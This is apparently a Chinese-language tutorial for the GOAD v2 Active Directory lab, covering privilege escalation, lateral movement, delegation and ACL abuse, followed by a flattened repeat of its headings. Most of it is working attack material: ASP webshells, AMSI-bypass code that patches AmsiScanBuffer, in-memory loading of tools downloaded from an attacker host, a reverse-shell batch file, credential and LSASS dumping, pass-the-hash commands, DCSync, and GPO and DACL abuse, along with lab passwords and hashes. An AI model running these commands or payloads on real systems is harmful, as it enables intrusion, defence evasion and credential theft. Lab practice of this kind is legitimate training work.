域渗透GOAD(Game Of Active Directory) v2(三)
字数 975 2025-08-25 22:58:34

域渗透GOAD(Game Of Active Directory) v2 教学文档

0x08 权限提升 (Privilege Escalation)

IIS - webshell利用

  1. 通过上传漏洞获取webshell:
    • 目标地址:http://192.168.56.22/Default.aspx
    • 作者提供的webshell代码: 
      <%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>
    • 蚁剑webshell代码: 
      <%Function xxxx(str) eval str End Function%><%D = request("ant")%><%xxxx D%>

AMSI绕过技术

  1. 修改版AMSI绕过代码: 
    $x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils')
$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static')
$z=$y.GetValue($null)
[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
  2. rasta mouse AMSI绕过: 
    $Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

内存加载工具

  1. 内存加载winPEAS: 
    $data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.1:8081/winPEASany_ofs.exe')
$asm = [System.Reflection.Assembly]::Load([byte[]]$data)
$out = [Console]::Out
$sWriter = New-Object IO.StringWriter
[Console]::SetOut($sWriter)
[winPEAS.Program]::Main("")
[Console]::SetOut($out)
$sWriter.ToString()

PrintSpoofer提权

  1. 使用SweetPotato提权:
    • 准备bat文件执行反向shell: 
      echo "@echo off" > runme.bat
echo "start /b $(python3 payload.py 192.168.56.1 4445)" >> runme.bat
echo "exit /b" >> runme.bat
    • 执行SweetPotato: 
      $data=(New-Object System.Net.WebClient).DownloadData('http://192.168.56.1:8080/SweetPotato.exe')
$asm = [System.Reflection.Assembly]::Load([byte[]]$data)
$out = [Console]::Out
$sWriter = New-Object IO.StringWriter
[Console]::SetOut($sWriter)
[SweetPotato.Program]::Main(@('-p=C:\temp\runme.bat'))
[Console]::SetOut($out)
$sWriter.ToString()

KrbRelay提权

  1. 检查LDAP签名: 
    cme ldap 192.168.56.10-12 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M ldap-signing
  2. 检查MAQ: 
    cme ldap 192.168.56.11 -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M MAQ
  3. 添加计算机: 
    addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'
  4. 获取计算机SID: 
    $o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=sevenkingdoms,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
  5. 执行KrbRelay: 
    .\KrbRelay.exe -spn ldap/winterfell.north.sevenkingdoms.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3279614554-4259096442-670903954-1122 -port 443

0x09 横向移动 (Lateral Move)

凭证提取

  1. 使用secretsdump提取凭证: 
    python secretsdump.py NORTH/jeor.mormont:'_L0ngCl@w_'@192.168.56.22
  2. 注册表提取SAM和SYSTEM: 
    reg.py NORTH/jeor.mormont:'_L0ngCl@w_'@192.168.56.22 save -keyName 'HKLM\SAM' -o '\\192.168.56.1\share'
reg.py NORTH/jeor.mormont:'_L0ngCl@w_'@192.168.56.22 save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\share'

密码重用攻击

  1. 使用CrackMapExec检查密码重用: 
    cme smb 192.168.56.10-23 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' --local-auth

LSASS转储

  1. 使用lsassy转储LSASS: 
    lsassy -d north.sevenkingdoms.local -u jeor.mormont -p _L0ngCl@w_ 192.168.56.22 -m dumpertdll -O dumpertdll_path=Outflank-Dumpert-DLL.dll

横向移动技术

  1. Impacket工具:

    • PsExec: 
      psexec -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
    • WmiExec: 
      wmiexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
    • SmbExec: 
      smbexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11
    • AtExec: 
      atexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11 whoami
    • DcomExec: 
      dcomexec.py -hashes ':cba36eccfd9d949c73bc73715364aff5' NORTH/catelyn.stark@192.168.56.11

  2. CrackMapExec执行命令:

    cme smb 192.168.56.11 -H ':cba36eccfd9d949c73bc73715364aff5' -d 'north' -u 'catelyn.stark' -x whoami

  3. WinRM连接:

    evil-winrm -i 192.168.56.11 -u catelyn.stark -H 'cba36eccfd9d949c73bc73715364aff5'

  4. RDP PTH攻击:

    • 开启restricted admin: 
      New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
    • 使用xfreerdp连接: 
      xfreerdp /u:catelyn.stark /d:north.sevenkingdoms.local /pth:cba36eccfd9d949c73bc73715364aff5 /v:192.168.56.11

TGT利用

  1. 获取TGT: 
    getTGT.py -hashes ':cba36eccfd9d949c73bc73715364aff5' north.sevenkingdoms.local/catelyn.stark
export KRB5CCNAME=catelyn.stark.ccache
  2. 使用TGT: 
    wmiexec.py -k -no-pass north.sevenkingdoms.local/catelyn.stark@winterfel

0x0A 委派攻击 (Delegations)

非约束委派

  1. 使用Rubeus监控TGT: 
    [Rubeus.Program]::MainString("triage")
  2. 强制DC认证: 
    python coercer.py -u arya.stark -d north.sevenkingdoms.local -p Needle -t kingslanding.sevenkingdoms.local -l winterfell
  3. 提取TGT: 
    [Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap")
  4. 转换为ccache: 
    cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
  5. DCSync: 
    secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING

约束委派

  1. 使用协议转换:
    • Rubeus: 
      .\Rubeus.exe asktgt /user:jon.snow /domain:north.sevenkingdoms.local /rc4:B8D76E56E9DAC90539AFF05E3CCB1755
.\Rubeus.exe s4u /ticket:put_the__previous_ticket_here /impersonateuser:administrator /msdsspn:CIFS/winterfell /ptt
    • Impacket: 
      getST.py -spn 'CIFS/winterfell' -impersonate Administrator -dc-ip '192.168.56.11' 'north.sevenkingdoms.local/jon.snow:iknownothing'
export KRB5CCNAME=Administrator.ccache
python wmiexec.py -k -no-pass north.sevenkingdoms.local/administrator@winterfell

基于资源的约束委派(RBCD)

  1. 添加计算机: 
    addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingslanding.sevenkingdoms.local 'sevenkingdoms.local/stannis.baratheon:Drag0nst0ne'
  2. 添加委派: 
    rbcd.py -delegate-from 'rbcd$' -delegate-to 'kingslanding$' -dc-ip 'kingslanding.sevenkingdoms.local' -action 'write' sevenkingdoms.local/stannis.baratheon:Drag0nst0ne
  3. 获取TGT: 
    getST.py -spn 'cifs/kingslanding.sevenkingdoms.local' -impersonate Administrator -dc-ip 'kingslanding.sevenkingdoms.local' 'sevenkingdoms.local/rbcd$:rbcdpass'
export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
wmiexec.py -k -no-pass @kingslanding.sevenkingdoms.local

0x0B ACL攻击

密码修改

  1. 修改用户密码: 
    net rpc password jaime.lannister -U sevenkingdoms.local/tywin.lannister%powerkingftw135 -S kingslanding.sevenkingdoms.local

Target Kerberoasting

  1. 使用targetedKerberoast: 
    python targetedKerberoast.py -v -d sevenkingdoms.local -u jaime.lannister -p pasdebraspasdechocolat --request-user joffrey.baratheon

Shadow Credentials

  1. 使用certipy: 
    certipy shadow auto -u jaime.lannister@sevenkingdoms.local -p 'pasdebraspasdechocolat' -account 'joffrey.baratheon'

DACL编辑

  1. 使用dacledit: 
    dacledit.py -action 'write' -rights 'FullControl' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'

组操作

  1. 使用ldeep添加组成员: 
    ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"

所有者修改

  1. 使用owneredit: 
    owneredit.py -action write -new-owner 'tyron.lannister' -target 'kingsguard' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' sevenkingdoms.local/tyron.lannister

GPO滥用

  1. 使用pyGPOAbuse: 
    python3 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "C040A8A9-BDB0-488B-84FF-7DD09C1C9337"

LAPS密码读取

  1. 使用CME: 
    cme ldap 192.168.56.12 -d essos.local -u jorah.mormont -p 'H0nnor!' --module laps
域渗透GOAD(Game Of Active Directory) v2 教学文档 0x08 权限提升 (Privilege Escalation) IIS - webshell利用 通过上传漏洞获取webshell: 目标地址: http://192.168.56.22/Default.aspx 作者提供的webshell代码: 蚁剑webshell代码: AMSI绕过技术 修改版AMSI绕过代码: rasta mouse AMSI绕过: 内存加载工具 内存加载winPEAS: PrintSpoofer提权 使用SweetPotato提权: 准备bat文件执行反向shell: 执行SweetPotato: KrbRelay提权 检查LDAP签名: 检查MAQ: 添加计算机: 获取计算机SID: 执行KrbRelay: 0x09 横向移动 (Lateral Move) 凭证提取 使用secretsdump提取凭证: 注册表提取SAM和SYSTEM: 密码重用攻击 使用CrackMapExec检查密码重用: LSASS转储 使用lsassy转储LSASS: 横向移动技术 Impacket工具: PsExec: WmiExec: SmbExec: AtExec: DcomExec: CrackMapExec执行命令: WinRM连接: RDP PTH攻击: 开启restricted admin: 使用xfreerdp连接: TGT利用 获取TGT: 使用TGT: 0x0A 委派攻击 (Delegations) 非约束委派 使用Rubeus监控TGT: 强制DC认证: 提取TGT: 转换为ccache: DCSync: 约束委派 使用协议转换: Rubeus: Impacket: 基于资源的约束委派(RBCD) 添加计算机: 添加委派: 获取TGT: 0x0B ACL攻击 密码修改 修改用户密码: Target Kerberoasting 使用targetedKerberoast: Shadow Credentials 使用certipy: DACL编辑 使用dacledit: 组操作 使用ldeep添加组成员: 所有者修改 使用owneredit: GPO滥用 使用pyGPOAbuse: LAPS密码读取 使用CME: